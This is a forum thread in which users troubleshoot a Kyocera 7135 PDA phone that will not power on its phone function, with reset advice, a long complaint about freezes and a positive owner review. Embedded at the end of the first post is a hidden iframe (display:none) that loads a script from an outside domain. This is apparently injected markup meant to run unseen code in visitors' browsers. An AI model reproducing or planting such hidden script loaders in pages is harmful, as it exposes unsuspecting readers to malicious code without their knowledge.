I recently acquired a Kyocera 7135. As of late, the phone function on the PDA does not work. I can power up the PDA functions and programs, but every time that I try to use the phone, it hangs up when it says "powering on." After sitting at that screen for several minutes, the phone goes back to saying "Power off." So, it seems to act normally until I try to turn on the phone.
I've tried to do a hard and soft reset. I've also tried removing the battery from the phone, but none of these attempts have worked. Any suggestions would be greatly appreciated. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Sounds like faulty hardware to me. I would contact Kyocera for warranty service or see if you can return the phone to Verizon for a new 7135 or refund.

IF you've done a hard reset, the preferences which are stored in ROM "default" so that the phone will AUTOMATICALLY power up on a HARD reset. What happens after a hard reset when the phone powers up (or tries to)?
I just did another hard reset so that I could tell you.
The 7135 powers on; it goes straight to preferences, starting at the "Date & Time" tab. Nothing happens other than that. If I press the 'end' key, the phone goes back to the "Phone is OFF" screen. The problem, however, is still present. I cannot turn on the phone.

sorry to sound as if I "doubt" you ... but are you SURE you're doing a HARD reset (which results in ALL data being wiped out)?
Because a hard reset REQUIRES you to re-calibrate the touch screen (i.e. tapping on various points). THEN, you should see a message "Routine maintenance in progress ...".
Try it again by holding the backlight button and simultaneously pressing reset. When you release the reset, you should get a message "Delete ALL data?".
If it doesn't work -- then you probably DO have a defective unit, in which case I'd have Verizon swap it out.
i have had my kyocera 7135 smartphone for a few months now. in the beginning, i loved it although it froze frequently. i then discovered that it was just like an desk/laptop computer. the software could not handle frequent usage and performed poorly on low battery. the phone would not sync with my laptop and i initially thought it was my fault. i didn't suspect that the software was faulty and never pursued transfering files to the kyocera computer desktop. one day, my phone froze and no matter what i pressed, nothing worked. it did this several times on a charged battery, not that a low battery should be such a big deal. i had to take out the battery and/or unplug the phone just like when a pc freezes. the phone would start setup processes all over again, erasing all previously inputed personal data. considering that i had only had the phone slightly less than two months at this point, i did not have a back up and so all was lost. even after erasing my data, the phone continued to shut down, the screen would go black with just a faint image hardly discernable in the background and no buttons could be pressed. it then stopped working completely and i had to take it back to verizon. the rep told me that the phones had software problems and that they could not be fixed. rather, they had to be replaced with brand new phones and the software had to be upgraded. there are a few noticable changes, including how the k, i, and t's are written with the stylus. two stroke letters are now used. also, my scientific calculator was not on the new phone. this was a major dissapointment(if anyone knows how i can get another, please email back). the new phone began freezing only four days after i got it. it has yet to erase though but luckily, it now syncs through the cradle, but not infa red. i find that this new phone does not function well on low battery and needs 2 or more bars to prevent restart. even when plugged into the car charger with 1 or less bars, the phone will drop calls and the screen will keep the last image, whatever that may be until you disconnect all power supplie. i was told that swapping the phone again would result in 1)the same mishaps, 2)kyocera is not recalling, 3)and the only option is to downgrade and lose money. if anyone has run into similar problems, please email me. i am a journalist and am looking for individuals to interview on this topic. success stories are also welcomed if you have had the pone for more than 3 months without problems.
I got one of the first released 7135's. I have the old original rom software. A friend of mine was a beta tester for for Kyocera for awhile. He tried the upgrade and wasn't impressed. In all the months that I have had my phone, I have never had to return it or upgrade it. It locks-up occassionaly (but then so did all my other Palms and Visors), usually after I forget to close out Avantgo. But I still love it. I travel alot on business and I got tired of lugging a laptop, a phone, a CD Player and a PDA through airports and now those screeners. Now I just carry one Kyocera 7135 and it handles all I need to do. If there is one drawback, it is only the short talk time on the battery. That is why my friend has moved on to another PDA/Phone. But he talks for hours at a time and he hates to use the charger. But even he still likes the phone. I for one am still very pleased with this instument and will continue to sing its praises! If you look at the PDA's that are for sale as "refurbished" units, you don't have to be rocket scientist to tell that every PDA is not perfect and there are always some bad ones that slip through. But as a whole there are thousands of 7135's out there that work just fine.
